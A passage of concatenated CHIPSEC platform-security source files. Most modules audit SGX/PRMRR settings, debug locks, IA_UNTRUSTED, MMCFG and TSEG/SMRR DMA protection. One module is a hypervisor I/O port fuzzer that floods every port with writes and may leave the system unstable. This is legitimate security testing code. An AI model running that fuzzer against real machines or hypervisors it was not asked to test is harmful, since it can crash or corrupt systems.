        prmrr_enable = False
        for tid in range(self.cs.msr.get_cpu_thread_count()):
            mtrrcap = self.cs.register.read_field('MTRRCAP', 'PRMRR', False, tid)
            if mtrrcap == 0:
                self.logger.log_verbose(f'[*] CPU{tid:d} Protected Memory Range configuration is not supported')
            else:
                prmrr_enable = True
                self.logger.log_verbose(f'[*] CPU{tid:d} Protected Memory Range configuration is supported')
        if prmrr_enable:
            self.logger.log_good('Protected Memory Range configuration is supported')
        else:
            self.logger.log_bad('Protected Memory Range configuration is not supported')
            self.res = ModuleResult.FAILED
            self.result.setStatusBit(self.result.status.UNSUPPORTED_FEATURE)

        self.logger.log('\n[*] Verifying PRMRR Configuration on each core.')

        self.prmrr = self.PRMRR(self.logger, self.cs)
        try:
            self.prmrr._check_prmrr()
        except HWAccessViolationError:
            self.prmrr.reset_variables()
            self.logger.log_important('Some PRMRR registers could not be read. Following results may not be accurate.')
            if self.cs.os_helper.is_windows():
                self.logger.log_important('Please try running in a Linux environment. The results there may be more complete.')
        else:
            self.check_prmrr_values()

        if bios_feature_control_enable and locked:
            sgx1_instr_support = False
            sgx2_instr_support = False
            self.logger.log('\n[*] Verifying if SGX instructions are supported')
            for tid in range(self.cs.msr.get_cpu_thread_count()):
                status = self.helper.set_affinity(tid)
                if status == -1:
                    self.logger.log_verbose(f'[*] Failed to set affinity to CPU{tid:d}')
                (r_eax, _, _, _) = self.cs.cpu.cpuid(0x012, 0x00)
                if r_eax & BIT0:
                    self.logger.log_verbose(f'[*] CPU{tid:d} SGX-1 instructions are supported')
                    sgx1_instr_support = True
                else:
                    self.logger.log_verbose(f'[*] CPU{tid:d} SGX-1 instructions are not supported')
                if r_eax & BIT1:
                    self.logger.log_verbose(f'[*] CPU{tid:d} SGX-2 instructions are supported')
                    sgx2_instr_support = True
                else:
                    self.logger.log_verbose(f'[*] CPU{tid:d} SGX-2 instructions are not supported')
            if sgx1_instr_support:
                self.logger.log_good('Intel SGX instructions are supported and available to use')
                sgx_ok = True
            else:
                self.logger.log_bad('Intel SGX instructions are not supported on system')
                sgx_ok = False
            if sgx2_instr_support:
                self.logger.log('[*] SGX-2 instructions are supported')
            else:
                self.logger.log('[*] SGX-2 instructions are not supported')
        else:
            sgx_ok = False

        self.logger.log('\n[*] Verifying if SGX is available to use')
        if sgx_ok and prmrr_enable and self.prmrr.uniform:
            self.logger.log_good('Intel SGX is available to use')
        elif (not sgx_ok) and (not bios_feature_control_enable) and prmrr_enable and self.prmrr.uniform:
            self.logger.log_important('Intel SGX instructions disabled by firmware')
            self.result.setStatusBit(self.result.status.FEATURE_DISABLED)
            if self.res == ModuleResult.PASSED:
                self.res = ModuleResult.WARNING
        else:
            self.logger.log_bad('Intel SGX is not available to use')
            self.res = ModuleResult.FAILED
            self.result.setStatusBit(self.result.status.FEATURE_DISABLED)

        if self.cs.register.is_defined('BIOS_SE_SVN') and self.cs.register.is_defined('BIOS_SE_SVN_STATUS'):
            self.cs.register.print('BIOS_SE_SVN', self.cs.register.read('BIOS_SE_SVN'))
            self.cs.register.print('BIOS_SE_SVN_STATUS', self.cs.register.read('BIOS_SE_SVN_STATUS'))

        debug_res, debug_result = self.check_debug()
        if self.cs.control.is_defined('SamplePart') and self.cs.control.get('SamplePart') == 1:
            self.res = ModuleResult.INFORMATION
        else:
            self.res = debug_res
            if debug_result is not None:
                self.result.setStatusBit(debug_result)

        return self.res

    def check_debug(self) -> Tuple:
        debug_res = self.res
        debug_result = None
        self.logger.log('\n[*] Check SGX debug feature settings')
        sgx_debug_status = self.cs.register.read_field('SGX_DEBUG_MODE', 'SGX_DEBUG_MODE_STATUS_BIT')
        self.logger.log(f'[*] SGX Debug Enable             : {sgx_debug_status:d}')
        self.logger.log('[*] Check Silicon debug feature settings')
        debug_interface = self.cs.register.read('IA32_DEBUG_INTERFACE')
        self.logger.log(f'[*]   IA32_DEBUG_INTERFACE : 0x{debug_interface:08X}')
        debug_enable = self.cs.register.get_field('IA32_DEBUG_INTERFACE', debug_interface, 'ENABLE')
        debug_lock = self.cs.register.get_field('IA32_DEBUG_INTERFACE', debug_interface, 'LOCK')
        self.logger.log(f'[*]     Debug enabled      : {debug_enable:d}')
        self.logger.log(f'[*]     Lock               : {debug_lock:d}')

        if sgx_debug_status == 1:
            self.logger.log_bad('SGX debug mode is enabled')
            debug_res = ModuleResult.FAILED
            debug_result = self.result.status.DEBUG_FEATURE
        else:
            self.logger.log_good('SGX debug mode is disabled')
        if debug_enable == 0:
            self.logger.log_good('Silicon debug features are disabled')
        else:
            self.logger.log_bad('Silicon debug features are not disabled')
            debug_res = ModuleResult.FAILED
            debug_result = self.result.status.DEBUG_FEATURE
        if (0 == debug_enable) and (1 == sgx_debug_status):
            self.logger.log_bad('Enabling sgx_debug without enabling debug mode in msr IA32_DEBUG_INTERFACE is not a valid configuration')
            debug_res = ModuleResult.FAILED
            debug_result = self.result.status.CONFIGURATION
        if debug_lock == 1:
            self.logger.log_good('Silicon debug Feature Control register is locked')
        else:
            self.logger.log_bad('Silicon debug Feature Control register is not locked')
            debug_res = ModuleResult.FAILED
            debug_result = self.result.status.LOCKS
        return debug_res, debug_result

    def check_prmrr_values(self) -> None:
        if not self.prmrr:
            return
        if not self.prmrr.uniform:
            self.logger.log_bad('PRMRR config is not uniform across all CPUs')
            self.res = ModuleResult.FAILED
            self.result.setStatusBit(self.result.status.CONFIGURATION)
        else:
            self.logger.log_good('PRMRR config is uniform across all CPUs')
            prmrr_configs = []
            config_support = False
            if BIT0 & self.prmrr.valid_config:
                prmrr_configs.append('1M')
                config_support = True
            if BIT1 & self.prmrr.valid_config:
                prmrr_configs.append('2M')
                config_support = True
            if BIT5 & self.prmrr.valid_config:
                prmrr_configs.append('32M')
                config_support = True
            if BIT6 & self.prmrr.valid_config:
                prmrr_configs.append('64M')
                config_support = True
            if BIT7 & self.prmrr.valid_config:
                prmrr_configs.append('128M')
                config_support = True
            if BIT8 & self.prmrr.valid_config:
                prmrr_configs.append('256M')
                config_support = True
            if config_support:
                prmrr_str = ', '.join(prmrr_configs)
                self.logger.log(f'[*]  PRMRR config supports: {prmrr_str}')
            else:
                self.logger.log('[*] PRMMR config has improper value')

            if (self.prmrr.base == 0) and (self.prmrr.mask == 0):
                self.logger.log('[*] PRMRR Base and Mask are set to zero.  PRMRR appears to be disabled.')
                self.logger.log('[*]   Skipping Base/Mask settings.')
            else:
                self.logger.log(f'[*]  PRMRR base address: 0x{self.prmrr.base:012X}')
                self.logger.log('[*]  Verifying PRMR memory type is valid')
                self.logger.log(f'[*]  PRMRR memory type : 0x{self.prmrr.base_memtype:X}')
                if self.prmrr.base_memtype == 0x6:
                    self.logger.log_good('PRMRR memory type is WB as expected')
                else:
                    self.logger.log_bad('Unexpected PRMRR memory type (not WB)')
                    self.res = ModuleResult.FAILED
                    self.result.setStatusBit(self.result.status.CONFIGURATION)
                self.logger.log(f'[*]  PRMRR mask address: 0x{self.prmrr.mask:012X}')
                self.logger.log('[*]  Verifying PRMR address are valid')
                self.logger.log(f'[*]      PRMRR uncore mask valid: 0x{self.prmrr.uncore_mask_vld:d}')
                if self.prmrr.mask_vld == 0x1:
                    self.logger.log_good('Mcheck marked PRMRR address as valid')
                else:
                    self.logger.log_bad('Mcheck marked PRMRR address as invalid')
                    self.res = ModuleResult.FAILED
                    self.result.setStatusBit(self.result.status.CONFIGURATION)
                self.logger.log('[*]  Verifying if PRMR mask register is locked')
                self.logger.log(f'[*]      PRMRR mask lock: 0x{self.prmrr.mask_lock:X}')
                if self.prmrr.locked:
                    self.logger.log_good('PRMRR MASK register is locked')
                else:
                    self.logger.log_bad('PRMRR MASK register is not locked')
                    self.res = ModuleResult.FAILED
                    self.result.setStatusBit(self.result.status.LOCKS)
                if self.prmrr.check_uncore_vals:
                    self.logger.log(f'[*]  PRMRR uncore base address: 0x{self.prmrr.uncore_base:012X}')
                    self.logger.log(f'[*]  PRMRR uncore mask address: 0x{self.prmrr.uncore_mask:012X}')
                    self.logger.log('[*]  Verifying PRMR uncore address are valid')
                    self.logger.log(f'[*]      PRMRR uncore mask valid: 0x{self.prmrr.uncore_mask_vld:X}')
                    if self.prmrr.uncore_mask_vld == 0x1:
                        self.logger.log_good('Mcheck marked uncore PRMRR address as valid')
                    else:
                        self.logger.log_bad('Mcheck marked uncore PRMRR address as invalid')
                        self.res = ModuleResult.FAILED
                        self.result.setStatusBit(self.result.status.CONFIGURATION)
                    self.logger.log('[*]  Verifying if PRMR uncore mask register is locked')
                    self.logger.log(f'[*]      PRMRR uncore mask lock: 0x{self.prmrr.uncore_mask_lock:X}')
                    if self.prmrr.uncore_mask_lock == 0x1:
                        self.logger.log_good('PMRR uncore MASK register is locked')
                    else:
                        self.logger.log_bad('PMRR uncore MASK register is not locked')
                        self.res = ModuleResult.FAILED
                        self.result.setStatusBit(self.result.status.LOCKS)

    class PRMRR():
        def __init__(self, logger, cs) -> None:
            self.logger = logger
            self.cs = cs
            self.reset_variables()
            self.sgx_helper = SGX_Check_Sidekick(self.cs)

        def reset_variables(self) -> None:
            self.valid_config = 0
            self.base = 0
            self.base_memtype = 0
            self.uncore_base = 0
            self.uncore_base_new = 0
            self.mask = 0
            self.uncore_mask = 0
            self.uncore_mask_new = 0
            self.mask_vld = 0
            self.uncore_mask_vld = 0
            self.uncore_mask_vld_new = 0
            self.mask_lock = 0
            self.uncore_mask_lock = 0
            self.uncore_mask_lock_new = 0
            self.uniform = False
            self.locked = False
            self.check_uncore_vals = False

        def _check_prmrr(self) -> None:
            self.reset_variables()
            first_iter = True
            self.uniform = True
            self.locked = True
            self.check_uncore_vals = self.cs.register.is_defined('PRMRR_UNCORE_PHYBASE') and self.cs.register.is_defined('PRMRR_UNCORE_MASK')
            for tid in range(self.cs.msr.get_cpu_thread_count()):
                self.check_valid = self.sgx_helper.check_valid(tid)
                self.valid_config_new = self.cs.register.read('PRMRR_VALID_CONFIG', tid)
                self.base_new = self.cs.register.read_field('PRMRR_PHYBASE', 'PRMRR_base_address_fields', False, tid)
                self.base_memtype_new = self.cs.register.read_field('PRMRR_PHYBASE', 'PRMRR_MEMTYPE', False, tid)
                self.mask_new = self.cs.register.read_field('PRMRR_MASK', 'PRMRR_mask_bits', False, tid)
                self.mask_vld_new = self.cs.register.read_field('PRMRR_MASK', 'PRMRR_VLD', False, tid)
                self.mask_lock_new = self.cs.register.read_field('PRMRR_MASK', 'PRMRR_LOCK', False, tid)
                if self.check_uncore_vals:
                    self.uncore_base_new = self.cs.register.read_field('PRMRR_UNCORE_PHYBASE', 'PRMRR_base_address_fields', False, tid)
                    self.uncore_mask_new = self.cs.register.read_field('PRMRR_UNCORE_MASK', 'PRMRR_mask_bits', False, tid)
                    self.uncore_mask_vld_new = self.cs.register.read_field('PRMRR_UNCORE_MASK', 'PRMRR_VLD', False, tid)
                    self.uncore_mask_lock_new = self.cs.register.read_field('PRMRR_UNCORE_MASK', 'PRMRR_LOCK', False, tid)
                if self.logger.VERBOSE:
                    self.logger.log(f'[*]      CPU{tid:d} PRMRR_VALID_CONFIG: 0x{self.valid_config_new:010X}')
                    self.logger.log(f'[*]      CPU{tid:d} PRMRR base address: 0x{self.base_new:012X}')
                    self.logger.log(f'[*]      CPU{tid:d} PRMRR memory type: 0x{self.base_memtype_new:d}')
                    self.logger.log(f'[*]      CPU{tid:d} PRMRR mask address: 0x{self.mask_new:012X}')
                    self.logger.log(f'[*]      CPU{tid:d} PRMRR mask valid: 0x{self.mask_vld_new:d}')
                    self.logger.log(f'[*]      CPU{tid:d} PRMRR mask lock: 0x{self.mask_lock_new:d}')
                    if self.check_uncore_vals:
                        self.logger.log(f'[*]      CPU{tid:d} PRMRR uncore base address: 0x{self.uncore_base_new:012X}')
                        self.logger.log(f'[*]      CPU{tid:d} PRMRR uncore mask address: 0x{self.uncore_mask_new:012X}')
                        self.logger.log(f'[*]      CPU{tid:d} PRMRR uncore mask valid: 0x{self.uncore_mask_vld_new:d}')
                        self.logger.log(f'[*]      CPU{tid:d} PRMRR uncore mask lock: 0x{self.uncore_mask_lock_new:d}')
                if first_iter:
                    self.valid_config = self.valid_config_new
                    self.base = self.base_new
                    self.base_memtype = self.base_memtype_new
                    self.mask = self.mask_new
                    self.mask_vld = self.mask_vld_new
                    self.mask_lock = self.mask_lock_new
                    self.uncore_base = self.uncore_base_new
                    self.uncore_mask = self.uncore_mask_new
                    self.uncore_mask_vld = self.uncore_mask_vld_new
                    self.uncore_mask_lock = self.uncore_mask_lock_new
                    first_iter = False
                if self.mask_lock_new == 0:
                    self.locked = False
                if ((self.valid_config != self.valid_config_new) or
                    (self.base != self.base_new) or (self.mask != self.mask_new) or
                    (self.uncore_base != self.uncore_base_new) or
                    (self.uncore_mask != self.uncore_mask_new) or
                    (self.mask_lock != self.mask_lock_new) or
                    (self.check_valid and ((self.mask_vld != self.mask_vld_new) or
                    (self.uncore_mask_vld != self.uncore_mask_vld_new))) or
                    (self.uncore_mask_lock != self.uncore_mask_lock_new) or
                        (self.base_memtype != self.base_memtype_new)):
                    self.uniform = False

    def run(self, _) -> int:
        self.logger.start_test('Check SGX feature support')

        self.res = self.check_sgx_config()
        if self.res == ModuleResult.INFORMATION:
            self.logger.log_passed('CPU is a Sample Part. Test is N/A.')
        elif self.res == ModuleResult.PASSED:
            self.logger.log_passed('All SGX checks passed')
        elif self.res == ModuleResult.WARNING:
            self.logger.log_warning('One or more SGX checks detected a warning')
        else:
            self.logger.log_failed('One or more SGX checks failed')

        return self.result.getReturnCode(self.res)




# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
The mmcfg_base command displays PCIe MMCFG Base/Size.

Usage:

>>> chipsec_util mmcfg_base

Examples:

>>> chipsec_util mmcfg_base
"""

from chipsec.command import BaseCommand, toLoad
from chipsec.hal import mmio


# Access to Memory Mapped PCIe Configuration Space (MMCFG)
class MMCfgBaseCommand(BaseCommand):

    def requirements(self) -> toLoad:
        return toLoad.All

    def parse_arguments(self) -> None:
        return

    def run(self) -> None:
        _mmio = mmio.MMIO(self.cs)
        pciexbarlist = _mmio.get_MMCFG_base_addresses()
        for pciexbar in pciexbarlist:
            self.logger.log(f'[CHIPSEC] Memory Mapped Config Base: 0x{pciexbar[0]:016X}')
            self.logger.log(f'[CHIPSEC] Memory Mapped Config Size: 0x{pciexbar[1]:016X}')
            self.logger.log('')


commands = {'mmcfg_base': MMCfgBaseCommand}



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2018-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

"""
IA Untrusted checks

Usage:
    ``chipsec_main -m common.cpu.ia_untrusted``

Examples:
    >>> chipsec_main.py -m common.cpu.ia_untrusted

Registers used:
    - MSR_BIOS_DONE.IA_UNTRUSTED
    - MSR_BIOS_DONE.SoC_BIOS_DONE

"""

from chipsec.module_common import BaseModule, HWCONFIG
from chipsec.library.returncode import ModuleResult
from typing import List

TAGS = [HWCONFIG]
METADATA_TAGS = ['OPENSOURCE', 'IA', 'COMMON', 'CPU', 'IA_UNTRUSTED']


class ia_untrusted(BaseModule):
    def __init__(self):
        BaseModule.__init__(self)
        self.result.url = 'https://chipsec.github.io/modules/chipsec.modules.common.cpu.ia_untrusted.html'

    def is_supported(self) -> bool:
        if self.cs.register.has_field('MSR_BIOS_DONE', 'IA_UNTRUSTED'):
            return True
        self.logger.log_important('MSR_BIOS_DONE.IA_UNTRUSTED is not defined for platform.  Skipping checks.')
        return False

    def check_untrusted(self) -> int:
        self.logger.log('[*] Check that untrusted mode has been set.')
        res = ModuleResult.PASSED
        if self.cs.register.has_field('MSR_BIOS_DONE', 'SoC_BIOS_DONE'):
            soc = self.cs.register.read_field('MSR_BIOS_DONE', 'SoC_BIOS_DONE')
            if soc == 0:
                res = ModuleResult.FAILED
                self.result.setStatusBit(self.result.status.CONFIGURATION)
                self.logger.log_bad('SoC_BIOS_DONE not set.')
            else:
                self.logger.log_good('SoC_BIOS_DONE set.')

        self.logger.log('')
        for tid in range(self.cs.msr.get_cpu_thread_count()):
            bd = self.cs.register.read('MSR_BIOS_DONE', tid)
            if self.logger.VERBOSE:
                self.cs.register.print('MSR_BIOS_DONE', bd)
            ia_untrusted = self.cs.register.get_field('MSR_BIOS_DONE', bd, 'IA_UNTRUSTED')
            if ia_untrusted == 0:
                res = ModuleResult.FAILED
                self.result.setStatusBit(self.result.status.CONFIGURATION)
                self.logger.log_bad(f'IA_UNTRUSTED not set on thread {tid:d}.')
            else:
                self.logger.log_good(f'IA_UNTRUSTED set on thread {tid:d}.')
        return res

    def run(self, module_argv: List[str]) -> int:
        self.logger.start_test('IA_UNTRUSTED Check')
        self.res = self.check_untrusted()
        self.logger.log('')
        if self.res == ModuleResult.PASSED:
            self.logger.log_passed('IA_UNTRUSTED set on all threads')
        elif self.res == ModuleResult.FAILED:
            self.logger.log_failed('IA_UNTRUSTED not set on all threads')

        return self.result.getReturnCode(self.res)



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2022, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

"""
SMM TSEG Range Configuration Checks

This module examines the configuration and locking of SMRAM range configuration protecting from DMA attacks.
If it fails, then DMA protection may not be securely configured to protect SMRAM.

Just like SMRAM needs to be protected from software executing on the CPU,
it also needs to be protected from devices that have direct access to DRAM (DMA).
Protection from DMA is configured through proper programming of SMRAM memory range.
If BIOS does not correctly configure and lock the configuration,
then malware could reprogram configuration and open SMRAM area to DMA access,
allowing manipulation of memory that should have been protected.

References:
    - `System Management Mode Design and Security Issues <http://www.ssi.gouv.fr/uploads/IMG/pdf/IT_Defense_2010_final.pdf>`_
    - `Summary of Attack against BIOS and Secure Boot <https://www.defcon.org/images/defcon-22/dc-22-presentations/Bulygin-Bazhaniul-Furtak-Loucaides/DEFCON-22-Bulygin-Bazhaniul-Furtak-Loucaides-Summary-of-attacks-against-BIOS-UPDATED.pdf>`_

Usage:
    ``chipsec_main -m smm_dma``

Examples:
    >>> chipsec_main.py -m smm_dma

Registers used:
    - TSEGBaseLock (control)
    - TSEGLimitLock (control)
    - MSR_BIOS_DONE.IA_UNTRUSTED
    - PCI0.0.0_TSEGMB.TSEGMB
    - PCI0.0.0_BGSM.BGSM
    - IA32_SMRR_PHYSBASE.PhysBase
    - IA32_SMRR_PHYSMASK.PhysMask

Supported Platforms:
    - Core (client)

"""

from chipsec.module_common import BaseModule, SMM, HWCONFIG
from chipsec.library.returncode import ModuleResult
from typing import List

_MODULE_NAME = 'smm_dma'

TAGS = [SMM, HWCONFIG]
METADATA_TAGS = ['OPENSOURCE', 'IA', 'COMMON', 'SMM_DMA']


class smm_dma(BaseModule):

    def __init__(self):
        BaseModule.__init__(self)

    def is_supported(self) -> bool:
        if self.cs.is_atom():
            self.logger.log_important('Module not supported on Atom platforms.  Skipping module.')
            return False
        elif self.cs.is_server():
            self.logger.log_important('Xeon (server) platform detected.  Skipping module.')
            return False
        elif not self.cs.control.is_defined('TSEGBaseLock') or not self.cs.control.is_defined('TSEGLimitLock'):
            self.logger.log_important('TSEGBaseLock and/or TSEGLimitLock control(s) not defined for platform.  Skipping module.')
            return False
        else:
            return True

    def check_tseg_locks(self) -> int:
        tseg_base_lock = self.cs.control.get('TSEGBaseLock')
        tseg_limit_lock = self.cs.control.get('TSEGLimitLock')
        ia_untrusted = 0
        if self.cs.register.has_field('MSR_BIOS_DONE', 'IA_UNTRUSTED'):
            ia_untrusted = self.cs.register.read_field('MSR_BIOS_DONE', 'IA_UNTRUSTED')

        if (tseg_base_lock and tseg_limit_lock) or (0 != ia_untrusted):
            self.logger.log_good("TSEG range is locked")
            return ModuleResult.PASSED
        else:
            self.logger.log_bad("TSEG range is not locked")
            self.result.setStatusBit(self.result.status.LOCKS)
            return ModuleResult.FAILED

    def check_tseg_config(self) -> int:
        res = ModuleResult.FAILED
        (tseg_base, tseg_limit, tseg_size) = self.cs.cpu.get_TSEG()
        self.logger.log(f"[*] TSEG      : 0x{tseg_base:016X} - 0x{tseg_limit:016X} (size = 0x{tseg_size:08X})")
        if self.cs.cpu.check_SMRR_supported():
            (smram_base, smram_limit, smram_size) = self.cs.cpu.get_SMRR_SMRAM()
            self.logger.log(f"[*] SMRR range: 0x{smram_base:016X} - 0x{smram_limit:016X} (size = 0x{smram_size:08X})\n")
        else:
            smram_base = 0
            smram_limit = 0
            self.logger.log("[*] SMRR is not supported\n")

        self.logger.log("[*] Checking TSEG range configuration..")
        if (0 == smram_base) and (0 == smram_limit):
            res = ModuleResult.WARNING
            self.logger.log_warning("TSEG is properly configured but can't determine if it covers entire SMRAM")
            self.result.setStatusBit(self.result.status.VERIFY)
        else:
            if (tseg_base <= smram_base) and (smram_limit <= tseg_limit):
                self.logger.log_good("TSEG range covers entire SMRAM")
                if self.check_tseg_locks() == ModuleResult.PASSED:
                    res = ModuleResult.PASSED
                    self.logger.log_passed("TSEG is properly configured. SMRAM is protected from DMA attacks")
                else:
                    self.logger.log_failed("TSEG is properly configured, but the configuration is not locked.")
                    self.result.setStatusBit(self.result.status.LOCKS)
            else:
                self.logger.log_bad("TSEG range doesn't cover entire SMRAM")
                self.logger.log_failed("TSEG is not properly configured. Portions of SMRAM may be vulnerable to DMA attacks")
                self.result.setStatusBit(self.result.status.POTENTIALLY_VULNERABLE)

        return self.result.getReturnCode(res)

    def run(self, module_argv: List[str]) -> int:
        self.logger.start_test("SMM TSEG Range Configuration Check")
        self.res = self.check_tseg_config()
        return self.res



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2020, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
Simple port I/O VMM emulation fuzzer

Usage:
    ``chipsec_main.py -i -m tools.vmm.iofuzz [-a <mode>,<count>,<iterations>]``

    - ``<mode>``         : SMI handlers testing mode
        - ``exhaustive`` : Fuzz all I/O ports exhaustively (default)
        - ``random``     : Fuzz randomly chosen I/O ports
    - ``<count>``        : Number of times to write to each port (default = 1000)
    - ``<iterations>``   : Number of I/O ports to fuzz (default = 1000000 in random mode)

Where:
    - ``[]``: optional line

Examples:
    >>> chipsec_main.py -i -m tools.vmm.iofuzz
    >>> chipsec_main.py -i -m tools.vmm.iofuzz -a random,9000,4000000

Additional options set within the module:
    - ``MAX_PORTS``                 : Maximum ports
    - ``MAX_PORT_VALUE``            : Maximum port value to use
    - ``DEFAULT_PORT_WRITE_COUNT``  : Default port write count if not specified with switches
    - ``DEFAULT_RANDOM_ITERATIONS`` : Default port write iterations if not specified with switches
    - ``_FLUSH_LOG_EACH_ITER``      : Flush log after each iteration
    - ``_FUZZ_SPECIAL_VALUES``      : Specify to use 1-2-4 byte values
    - ``_EXCLUDE_PORTS``            : Ports to exclude (list)

.. note::
    - Returns a Warning by default
    - System may be in an unknown state, further evaluation may be needed

.. important::
    - This module is designed to run in a VM environment
    - Behavior on physical HW is undefined

"""

import random

from chipsec.module_common import BaseModule
from chipsec.library.returncode import ModuleResult

MAX_PORTS = 0x10000
MAX_PORT_VALUE = 0xFF
DEFAULT_PORT_WRITE_COUNT = 1000
DEFAULT_RANDOM_ITERATIONS = 1000000

# Flush log file before each port
_FLUSH_LOG_EACH_ITER = False

# Control values to be written to each port
_FUZZ_SPECIAL_VALUES = True

# List I/O port numbers you want to exclude from fuzzing
_EXCLUDE_PORTS = []


class iofuzz(BaseModule):
    def __init__(self):
        BaseModule.__init__(self)

    def fuzz_ports(self, iterations, write_count, random_order=False):

        if random_order:
            self.logger.log(f'[*] Fuzzing randomly chosen {iterations:d} I/O ports..\n')
        else:
            self.logger.log(f'[*] Fuzzing I/O ports in a range 0:0x{iterations - 1:X}..\n')

        io_addr = 0
        for it in range(iterations):

            if _FLUSH_LOG_EACH_ITER:
                self.logger.flush()

            if random_order:
                io_addr = random.randint(0, MAX_PORTS)
            else:
                io_addr = it

            if io_addr in _EXCLUDE_PORTS:
                self.logger.log(f'[*] Skipping port 0x{io_addr:04X}')
                continue

            self.logger.log(f'[*] Fuzzing I/O port 0x{io_addr:04X}')

            self.logger.log('    Reading port')
            port_value = self.cs.io.read_port_byte(io_addr)

            if _FUZZ_SPECIAL_VALUES:
                self.logger.log('    Writing special 1-2-4 byte values')
                try:
                    self.cs.io.write_port_byte(io_addr, port_value)
                    self.cs.io.write_port_byte(io_addr, (~port_value) & 0xFF)
                    self.cs.io.write_port_byte(io_addr, 0xFF)
                    self.cs.io.write_port_byte(io_addr, 0x00)
                    self.cs.io.write_port_byte(io_addr, 0x5A)
                    self.cs.io.write_port_word(io_addr, 0xFFFF)
                    self.cs.io.write_port_word(io_addr, 0x0000)
                    self.cs.io.write_port_word(io_addr, 0x5AA5)
                    self.cs.io.write_port_dword(io_addr, 0xFFFFFFFF)
                    self.cs.io.write_port_dword(io_addr, 0x00000000)
                    self.cs.io.write_port_word(io_addr, 0x5AA55AA5)
                except:
                    pass

            self.logger.log(f'    Writing values 0..{MAX_PORT_VALUE:X} ({write_count:d} times each)')
            for v in range(MAX_PORT_VALUE + 1):
                for _ in range(write_count):
                    try:
                        self.cs.io.write_port_byte(io_addr, v)
                    except:
                        pass

        self.result.setStatusBit(self.result.status.VERIFY)
        return self.result.getReturnCode(ModuleResult.WARNING)

    def run(self, module_argv):
        self.logger.start_test('I/O port fuzzer')

        _random_order = (len(module_argv) > 0) and ('random' == module_argv[0].lower())
        write_count = int(module_argv[1]) if len(module_argv) > 1 else DEFAULT_PORT_WRITE_COUNT
        if len(module_argv) > 2:
            iterations = int(module_argv[2])
        else:
            iterations = DEFAULT_RANDOM_ITERATIONS if _random_order else MAX_PORTS

        self.logger.log('\n[*] Configuration:')
        self.logger.log(f'    Mode             : {"random" if _random_order else "exhaustive"}')
        self.logger.log(f'    Write count      : {write_count:d}')
        self.logger.log(f'    Ports/iterations : {iterations:d}\n')

        self.res = self.fuzz_ports(iterations, write_count, _random_order)

        self.logger.log_information('Module completed')
        self.logger.log_warning('System may be in an unknown state, further evaluation may be needed.')
        return self.res



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
Access to Port I/O

usage:
    >>> read_port_byte( 0x61 )
    >>> read_port_word( 0x61 )
    >>> read_port_dword( 0x61 )
    >>> write_port_byte( 0x71, 0 )
    >>> write_port_word( 0x71, 0 )
    >>> write_port_dword( 0x71, 0 )
"""

from typing import List
from chipsec.library.logger import logger


class PortIO:

    def __init__(self, cs):
        self.helper = cs.helper
        self.cs = cs

    def _read_port(self, io_port: int, size: int) -> int:
        value = self.helper.read_io_port(io_port, size)
        if logger().HAL:
            logger().log(f"[io] IN 0x{io_port:04X}: value = 0x{value:08X}, size = 0x{size:02X}")
        return value

    def _write_port(self, io_port: int, value: int, size: int) -> int:
        if logger().HAL:
            logger().log(f"[io] OUT 0x{io_port:04X}: value = 0x{value:08X}, size = 0x{size:02X}")
        status = self.helper.write_io_port(io_port, value, size)
        return status

    def read_port_dword(self, io_port: int) -> int:
        value = self.helper.read_io_port(io_port, 4)
        if logger().HAL:
            logger().log(f"[io] reading dword from I/O port 0x{io_port:04X} -> 0x{value:08X}")
        return value

    def read_port_word(self, io_port: int) -> int:
        value = self.helper.read_io_port(io_port, 2)
        if logger().HAL:
